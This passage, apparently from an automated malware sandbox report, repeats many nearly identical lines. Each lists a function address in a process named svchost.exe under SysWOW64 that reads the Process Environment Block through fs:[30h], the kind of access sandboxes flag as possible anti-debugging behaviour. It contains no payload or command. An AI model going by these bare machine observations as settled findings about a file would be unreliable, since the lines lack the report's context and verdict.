            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260124 mov eax, dword ptr fs:[00000030h]1_2_03260124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov ecx, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F0115 mov eax, dword ptr fs:[00000030h]1_2_032F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]1_2_03304164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]1_2_03304164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov ecx, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C156 mov eax, dword ptr fs:[00000030h]1_2_0322C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C8158 mov eax, dword ptr fs:[00000030h]1_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]1_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]1_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03270185 mov eax, dword ptr fs:[00000030h]1_2_03270185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]1_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]1_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]1_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]1_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033061E5 mov eax, dword ptr fs:[00000030h]1_2_033061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032601F8 mov eax, dword ptr fs:[00000030h]1_2_032601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]1_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]1_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A020 mov eax, dword ptr fs:[00000030h]1_2_0322A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C020 mov eax, dword ptr fs:[00000030h]1_2_0322C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6030 mov eax, dword ptr fs:[00000030h]1_2_032C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4000 mov ecx, dword ptr fs:[00000030h]1_2_032B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C073 mov eax, dword ptr fs:[00000030h]1_2_0325C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232050 mov eax, dword ptr fs:[00000030h]1_2_03232050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6050 mov eax, dword ptr fs:[00000030h]1_2_032B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C80A8 mov eax, dword ptr fs:[00000030h]1_2_032C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov eax, dword ptr fs:[00000030h]1_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov ecx, dword ptr fs:[00000030h]1_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323208A mov eax, dword ptr fs:[00000030h]1_2_0323208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0322A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032380E9 mov eax, dword ptr fs:[00000030h]1_2_032380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B60E0 mov eax, dword ptr fs:[00000030h]1_2_032B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C0F0 mov eax, dword ptr fs:[00000030h]1_2_0322C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032720F0 mov ecx, dword ptr fs:[00000030h]1_2_032720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B20DE mov eax, dword ptr fs:[00000030h]1_2_032B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov ecx, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AC730 mov eax, dword ptr fs:[00000030h]1_2_032AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C700 mov eax, dword ptr fs:[00000030h]1_2_0326C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230710 mov eax, dword ptr fs:[00000030h]1_2_03230710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260710 mov eax, dword ptr fs:[00000030h]1_2_03260710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238770 mov eax, dword ptr fs:[00000030h]1_2_03238770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov esi, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230750 mov eax, dword ptr fs:[00000030h]1_2_03230750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE75D mov eax, dword ptr fs:[00000030h]1_2_032BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]1_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]1_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4755 mov eax, dword ptr fs:[00000030h]1_2_032B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032307AF mov eax, dword ptr fs:[00000030h]1_2_032307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E47A0 mov eax, dword ptr fs:[00000030h]1_2_032E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D678E mov eax, dword ptr fs:[00000030h]1_2_032D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE7E1 mov eax, dword ptr fs:[00000030h]1_2_032BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]1_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]1_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323C7C0 mov eax, dword ptr fs:[00000030h]1_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B07C3 mov eax, dword ptr fs:[00000030h]1_2_032B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E627 mov eax, dword ptr fs:[00000030h]1_2_0324E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03266620 mov eax, dword ptr fs:[00000030h]1_2_03266620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268620 mov eax, dword ptr fs:[00000030h]1_2_03268620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323262C mov eax, dword ptr fs:[00000030h]1_2_0323262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE609 mov eax, dword ptr fs:[00000030h]1_2_032AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272619 mov eax, dword ptr fs:[00000030h]1_2_03272619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]1_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]1_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]1_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]1_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03262674 mov eax, dword ptr fs:[00000030h]1_2_03262674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324C640 mov eax, dword ptr fs:[00000030h]1_2_0324C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C6A6 mov eax, dword ptr fs:[00000030h]1_2_0326C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032666B0 mov eax, dword ptr fs:[00000030h]1_2_032666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]1_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]1_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]1_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]1_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A6C7 mov eax, dword ptr fs:[00000030h]1_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6500 mov eax, dword ptr fs:[00000030h]1_2_032C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]1_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]1_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]1_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]1_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232582 mov eax, dword ptr fs:[00000030h]1_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232582 mov ecx, dword ptr fs:[00000030h]1_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264588 mov eax, dword ptr fs:[00000030h]1_2_03264588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E59C mov eax, dword ptr fs:[00000030h]1_2_0326E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032325E0 mov eax, dword ptr fs:[00000030h]1_2_032325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]1_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]1_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]1_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]1_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032365D0 mov eax, dword ptr fs:[00000030h]1_2_032365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]1_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]1_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C427 mov eax, dword ptr fs:[00000030h]1_2_0322C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC460 mov ecx, dword ptr fs:[00000030h]1_2_032BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
